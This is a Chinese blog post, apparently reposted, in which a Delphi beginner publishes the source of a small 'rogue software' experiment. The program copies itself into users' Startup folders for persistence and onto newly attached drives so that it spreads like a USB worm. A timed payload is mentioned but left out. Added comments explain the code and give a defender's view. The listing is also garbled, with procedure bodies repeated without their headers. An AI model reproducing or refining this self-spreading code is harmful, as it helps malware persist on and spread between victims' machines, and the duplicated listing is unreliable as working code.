前不久在学习Delphi,因为在做系统维护时经常接触到流氓软件,所以对流氓软件的功能实现有了兴趣,决定通过实践,看看流氓软件的部分功能都是如何实现的。经过一段时间的测试,做了一个极其简单的小软件,软件运行后除了会将自己复制到某些特定的文件夹中,还会自动在后台监视盘符变化,一旦有U盘或者移动硬盘接到计算机上,软件会自动将自身复制到U盘或者移动硬盘的第一个分区上,还可以在指定时间进行一些操作,由于这部分危害比较大,就不贴出来了。因为学Delphi时间不长,也就一个月左右,可能有些地方的代码处理得不够简洁,也希望得到高手的指点。本代码只作为研究学习之用,请不要用于非法用途,否则本人概不负责。代码如下:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
Dialogs,ShellApi,StdCtrls, ExtCtrls;
Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
Dialogs,ShellApi,StdCtrls, ExtCtrls;
type
// Main form of the sample. It declares one timer component, the two event
// handlers implemented below, and a private handler bound to the
// WM_DEVICECHANGE window message.
TForm1 = class(TForm)
Timer1: TTimer;
// Form-creation handler; see TForm1.FormCreate for what it copies and where.
procedure FormCreate(Sender: TObject);
// Timer tick handler; its body is omitted by the author in this listing.
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
// The "message" directive routes WM_DEVICECHANGE to this method, so the form
// reacts to device-change notifications without any polling.
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
// NOTE(review): the declaration below repeats the one above verbatim. It looks
// like a page-extraction duplicate rather than part of the original unit.
TForm1 = class(TForm)
Timer1: TTimer;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
var
Form1: TForm1;
Form1: TForm1;
implementation
{$R *.dfm}
// Handler for the WM_DEVICECHANGE window message.
// On the event code 32768 it enumerates the logical drive roots and, for each
// root that GetDriveType reports as DRIVE_CDROM and that equals E:\, F:\, G:\
// or H:\, copies the running executable to the root of the next drive letter
// under the fixed name test.exe. The event code 32772 is handled by an empty
// branch.
// Defender's view: a process writing a copy of its own image to the root of
// another volume right after a device notification is a propagation indicator.
// File-creation telemetry for executables at volume roots covers this behaviour.
procedure TForm1.WMDeviceChange (var Msg: TMessage);
var
m_Result,i:Integer;
str_temp:string;
buf:array [0..MAX_PATH-1] of char;
begin
Case Msg.WParam of
// 32768 = $8000, the DBT_DEVICEARRIVAL event code.
32768:
begin
// Fills buf with NUL-separated drive root strings and returns the number of
// characters written.
m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
// The code assumes each entry occupies four characters ("X:\" plus NUL).
for i:=0 to (m_Result div 4) do
begin
// Rebuild the three-character root path of entry i.
str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
// As written, the branch is taken only for drives reported as DRIVE_CDROM.
if getdrivetype(pchar(str_temp)) = DRIVE_CDROM then
begin
// Hard-coded mapping: the matched root decides which following drive letter
// receives the copy. The last CopyFile argument (bFailIfExists) is False, so
// an existing test.exe at the destination is overwritten.
if str_temp ='E:\' then
CopyFile(Pchar(Application.ExeName),Pchar('F:\test.exe'),False);
if str_temp ='F:\' then
CopyFile(Pchar(Application.ExeName),Pchar('G:\test.exe'),False);
if str_temp ='G:\' then
CopyFile(Pchar(Application.ExeName),Pchar('H:\test.exe'),False);
if str_temp ='H:\' then
CopyFile(Pchar(Application.ExeName),Pchar('I:\test.exe'),False);
end;
end;
end;
// 32772 = $8004, the DBT_DEVICEREMOVECOMPLETE event code; nothing is done here.
32772:
begin
end;
end;
end;
// NOTE(review): the lines from here to the end of this block repeat the
// procedure body above verbatim, without its header. This looks like a
// page-extraction duplicate rather than part of the original unit.
var
m_Result,i:Integer;
str_temp:string;
buf:array [0..MAX_PATH-1] of char;
begin
Case Msg.WParam of
32768:
begin
m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
for i:=0 to (m_Result div 4) do
begin
str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
if getdrivetype(pchar(str_temp)) = DRIVE_CDROM then
begin
if str_temp ='E:\' then
CopyFile(Pchar(Application.ExeName),Pchar('F:\test.exe'),False);
if str_temp ='F:\' then
CopyFile(Pchar(Application.ExeName),Pchar('G:\test.exe'),False);
if str_temp ='G:\' then
CopyFile(Pchar(Application.ExeName),Pchar('H:\test.exe'),False);
if str_temp ='H:\' then
CopyFile(Pchar(Application.ExeName),Pchar('I:\test.exe'),False);
end;
end;
end;
32772:
begin
end;
end;
end;
// Form-creation handler: copies the running executable as test.exe into the
// Startup folders of two hard-coded user profiles ("Administrator" and "new").
// The paths use the "Documents and Settings" layout with the Chinese-localized
// Start Menu folder names.
// Defender's view: this is Startup-folder persistence, since files placed there
// are launched at that user's logon. Creation of an executable in any user's
// Startup folder by a non-installer process is a signal worth alerting on, and
// the per-user Startup folders belong in a host triage checklist.
procedure TForm1.FormCreate(Sender: TObject);
begin
// When both copies already exist the "then" branch is empty.
if fileexists('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\test.exe') and fileexists('C:\Documents and Settings\new\「开始」菜单\程序\启动\test.exe')then
else
// Only this first CopyFile belongs to the "else". bFailIfExists is False, so an
// existing file is overwritten.
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\test.exe'),False);
// This statement is outside the if/else and therefore runs on every form
// creation.
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\new\「开始」菜单\程序\启动\test.exe'),False);
end;
// NOTE(review): the lines below repeat the procedure body above verbatim,
// without its header. This looks like a page-extraction duplicate rather than
// part of the original unit.
begin
if fileexists('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\test.exe') and fileexists('C:\Documents and Settings\new\「开始」菜单\程序\启动\test.exe')then
else
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\test.exe'),False);
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\new\「开始」菜单\程序\启动\test.exe'),False);
end;
// Tick handler for Timer1. In this listing the body is empty: the author left
// out the scheduled action. The locals i, j and strurl are declared but never
// used in the visible code.
procedure TForm1.Timer1Timer(Sender: TObject);
var
i,j:integer;
strurl:string;
begin
// Some operations can be carried out at a specified time; that code is
// comparatively harmful and has been omitted by the author.
end;
// NOTE(review): the lines below repeat the procedure body above verbatim,
// without its header. This looks like a page-extraction duplicate rather than
// part of the original unit.
var
i,j:integer;
strurl:string;
begin
// Some operations can be carried out at a specified time; that code is
// comparatively harmful and has been omitted by the author.
end;
end.
转载于:https://blog.51cto.com/sally/116369